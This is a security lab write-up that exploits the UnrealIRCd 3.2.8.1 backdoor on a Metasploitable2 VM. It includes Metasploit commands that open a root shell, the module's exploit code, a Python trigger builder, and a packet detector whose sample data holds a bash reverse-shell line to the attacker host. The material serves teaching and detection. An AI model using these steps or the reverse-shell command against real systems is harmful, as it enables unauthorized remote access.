(4) Attacking a bug (a vulnerability that is a built-in backdoor)
■ Lab systems
- Kali Linux (attacker system)
- Metasploitable V2 Linux (victim system)
■ Overview of the attack
What is UnrealIRCd?
UnrealIRCd is an open source IRC daemon, originally based on DreamForge, and is available for Unix-like
operating systems and Windows. Since the beginning of development on UnrealIRCd circa May 1999, many new
features have been added and modified, including advanced security features and bug fixes, and it has
become a popular server.
The UnrealIRCd bug
On port 6667, Metasploitable2 runs the UnrealIRCd IRC daemon. This version contains a backdoor that went
unnoticed for months - triggered by sending the letters "AB" followed by a system command to the server
on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell.
This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
In other words, this applies to IRC daemons installed from the archive downloaded during that window.
exploit/unix/irc/unreal_ircd_3281_backdoor
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive.
This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
■ Exploitation procedure (a vulnerability that is a built-in backdoor)
(Kali Linux)
① Confirm the UnrealIRCd daemon
# nmap -sV 192.168.10.134
********************************************************************************
# nmap -sV 192.168.10.134 2>&1 | tee -a scan.txt    (print to the terminal and also save the output to a file)
   -a : append to the file if it already exists
# cd /test
# ls -l /var /nodir
# ls -l /var /nodir | tee file.log         (error messages are not saved to the file: only stdout goes through the pipe to tee)
# ls -l /var /nodir 2>&1 | tee file.log    (how to save the error messages as well: redirect stderr into stdout first)
**************************************************************************************************
.....
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
***********************************************************************************
-> Unreal ircd listens on ports 6667 and 6697.
[Note] A more thorough scan can be done as follows.
# nmap -p 1-65535 -T4 -A -v 192.168.10.134 2>&1 | tee scan.txt
# egrep -i '(6667|6697|ircd)' scan.txt
Discovered open port 6697/tcp on 192.168.10.134
Discovered open port 6667/tcp on 192.168.10.134
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd
***********************************************************************************
② Run Wireshark and analyze the packets
# wireshark &    (capture on eth0)
-> Analyze the packets.
③ Run msfconsole
# msfconsole -q
msf > search unreal_ircd
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.10.134
RHOST => 192.168.10.134
msf exploit(unreal_ircd_3281_backdoor) > run

Reading from sockets...
[*] Reading from socket B
[*] B: "AshVia2s0tz2A7vZ\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.50:4444 -> 192.168.10.134:54360) at 2016-03-31 22:10:01 +0900

id
uid=0(root) gid=0(root)
hostname
metasploitable
^C
Abort session 2? [y/N]  y

[*] 192.168.10.134 - Command shell session 2 closed.  Reason: User exit
msf exploit(unreal_ircd_3281_backdoor) > edit
...... (omitted) .....
57   def exploit
58     connect
59
60     print_status("Connected to #{rhost}:#{rport}...")
61     banner = sock.get_once(-1, 30)
62     banner.to_s.split("\n").each do |line|
63       print_line("    #{line}")
64     end
65
66     print_status("Sending backdoor command...")
67     sock.put("AB;" + payload.encoded + "\n")
68
69     # Wait for the request to be handled
70     1.upto(120) do
71       break if session_created?
72       select(nil, nil, nil, 0.25)
73       handler()
74     end
75     disconnect
76   end
77 end
:q!
msf exploit(unreal_ircd_3281_backdoor) >
**************************************************************************************************************************
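What module line 67 (sock.put("AB;" + payload.encoded + "\n")) actually puts on the wire, and how the trojaned daemon decided whether to act on it, as an added example in Python. This is not code from this page, from Metasploit or from UnrealIRCd: the mock daemon is a constructed stand-in that records the triggering line instead of handing it to system() as the real backdoor did, so the whole exchange runs offline on loopback. The greeting text, the "irc.example" host name and the helper names are this example's own assumptions.

```python
import socket
import threading

# The trojaned read path compared the first two bytes of the received buffer
# with "AB" and passed the whole buffer to system().
TRIGGER_PREFIX = b"AB"


def build_trigger(command: str) -> bytes:
    """Build the line the module sends: "AB;" + payload.encoded + "\n".

    system("AB;<command>") first tries to run a program called AB (which does
    not exist) and then runs <command>; that is what the ';' is for.
    """
    if "\n" in command or "\r" in command:
        raise ValueError("command must be a single line")
    return TRIGGER_PREFIX + b";" + command.encode() + b"\n"


def send_line(host: str, port: int, line: bytes, timeout: float = 5.0) -> bytes:
    """Connect, read the daemon's greeting (if any), send one raw line, return the greeting."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        try:
            banner = sock.recv(4096)
        except socket.timeout:
            banner = b""
        sock.sendall(line)
        return banner


def send_backdoor_command(host: str, port: int, command: str, timeout: float = 5.0) -> bytes:
    """Same sequence as the module's exploit method: connect, read banner, send trigger."""
    return send_line(host, port, build_trigger(command), timeout)


class MockBackdooredIrcd:
    """CONSTRUCTED stand-in for the trojaned daemon's read path (offline only).

    It answers with an IRC-style greeting, then applies the trojan's check to
    the first buffer it reads. Where the real backdoor called system(), this
    only records the line; anything else is treated as ordinary IRC input.
    """

    def __init__(self) -> None:
        self.seen = None  # the triggering line, or None if the check did not fire
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.bind(("127.0.0.1", 0))  # ephemeral loopback port, nothing exposed
        self._srv.listen(1)
        self.port = self._srv.getsockname()[1]
        self._thread = threading.Thread(target=self._serve, daemon=True)
        self._thread.start()

    def _serve(self) -> None:
        conn, _ = self._srv.accept()
        with conn:
            conn.sendall(b":irc.example NOTICE AUTH :*** Looking up your hostname...\r\n")
            buf = conn.recv(4096)
            if buf[:2] == TRIGGER_PREFIX:  # the trojan's test: memcmp(readbuf, "AB", 2) == 0
                self.seen = buf.decode("utf-8", errors="replace").rstrip("\r\n")
        self._srv.close()

    def wait(self) -> None:
        self._thread.join(timeout=5)


def probe(line: bytes) -> dict:
    """Send one raw line to a fresh mock daemon and report what its read path did."""
    mock = MockBackdooredIrcd()
    banner = send_line("127.0.0.1", mock.port, line)
    mock.wait()
    return {"banner": banner, "triggered": mock.seen}


if __name__ == "__main__":
    print(probe(build_trigger("id")))        # check fires: 'triggered': 'AB;id'
    print(probe(b"NICK kali\r\n"))           # normal IRC input: 'triggered': None
    print(probe(b"PRIVMSG #c :AB;id\r\n"))   # "AB" not at byte 0: 'triggered': None
```

Against a real target, `command` plays the role of `payload.encoded` in the module: a reverse-shell one-liner that connects back to a listener on the attacker host (the 192.168.10.50:4444 handler in the session above). A command such as `id` does execute on the victim, but system() writes nothing back on the IRC connection, which is why the module opens a separate reverse connection instead of reading a reply from the socket it sent the trigger on.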
④ Write the analysis report
Analyze the unreal_ircd_3281_backdoor.rb file and the captured packets, and write a report covering:
- (a) packet analysis
- (b) program (module) analysis
- (c) how the packet/program analysis results relate to the "Overview of the attack" section
# cat scan.txt
........... Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
msf exploit(unreal_ircd_3281_backdoor) > edit
66     print_status("Sending backdoor command...")
67     sock.put("AB;" + payload.encoded + "\n")
-> In Wireshark, search the capture for the string "AB" (Edit > Find Packet, String): the line sent by module line 67 appears at the start of the TCP payload in the port 6667 stream, right after the server's greeting.
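For the packet-analysis part of the report, an added detection example in Python; it is not code from this page or from any tool. The sample packets are constructed to resemble what Follow TCP Stream shows for the session above, with a made-up timestamp and field layout, not a real capture. It applies the same test the trojan applied (the first two bytes of the TCP payload on an IRC port) and contrasts it with a plain Wireshark string search for "AB", which also matches harmless text on other ports.

```python
import re
from dataclasses import dataclass
from typing import List

IRC_PORTS = {6667, 6697}


@dataclass
class Packet:
    ts: str
    src: str
    dst: str
    dport: int
    payload: bytes  # TCP payload, as Wireshark shows it in Follow TCP Stream


def is_trigger(payload: bytes) -> bool:
    # Mirrors the trojan's own test, memcmp(readbuf, "AB", 2) == 0: only the
    # first two bytes of the read buffer matter, not an "AB" anywhere in the text.
    return payload[:2] == b"AB"


def extract_command(payload: bytes) -> str:
    # system("AB;<cmd>") runs the non-existent program AB and then <cmd>,
    # so the part worth reporting is whatever follows the first ';'.
    line = payload.split(b"\n", 1)[0]
    rest = line[2:]
    if rest.startswith(b";"):
        rest = rest[1:]
    return rest.decode("utf-8", errors="replace").strip()


def scan(packets: List[Packet]) -> List[dict]:
    """Flag payloads to an IRC port that would have reached system() in the trojaned build."""
    findings = []
    for p in packets:
        if p.dport not in IRC_PORTS:
            continue
        if is_trigger(p.payload):
            findings.append({
                "ts": p.ts, "src": p.src, "dst": p.dst,
                "rule": "unrealircd_3281_backdoor_trigger",
                "command": extract_command(p.payload),
            })
    return findings


def naive_string_hits(packets: List[Packet]) -> List[str]:
    """What a plain Wireshark string search for "AB" would return, for comparison."""
    return [p.ts for p in packets if b"AB" in p.payload]


# Constructed sample, not a real capture: attacker 192.168.10.50 -> victim 192.168.10.134.
SAMPLE = [
    Packet("22:09:58.101", "192.168.10.50", "192.168.10.134", 6667,
           b"NICK kali\r\nUSER kali 0 * :kali\r\n"),
    Packet("22:09:58.402", "192.168.10.50", "192.168.10.134", 6667,
           b"PRIVMSG #test :ABOUT time, AB;id is not a command\r\n"),   # "AB" mid-line: harmless
    Packet("22:10:00.917", "192.168.10.50", "192.168.10.134", 6667,
           b"AB;id\n"),                                                 # trigger
    Packet("22:10:01.003", "192.168.10.50", "192.168.10.134", 8180,
           b"GET /AB HTTP/1.0\r\n\r\n"),                                # not an IRC port
    Packet("22:10:01.120", "192.168.10.50", "192.168.10.134", 6667,
           b"AB;bash -c 'bash -i >& /dev/tcp/192.168.10.50/4444 0>&1'\n"),  # trigger, reverse shell
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"{f['ts']} {f['src']} -> {f['dst']} {f['rule']}: {f['command']}")
    print("naive string-search hits:", naive_string_hits(SAMPLE))
```

Two of the five samples are real triggers; the naive string search also matches the PRIVMSG text and the HTTP request, so when writing up the capture it is the position of "AB" at the start of a TCP segment to port 6667, right after the greeting, that identifies the backdoor use, not the presence of the two letters anywhere in the stream.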
Metasploitable V2 Linux server vulnerabilities (Backdoor) | 2017.01.09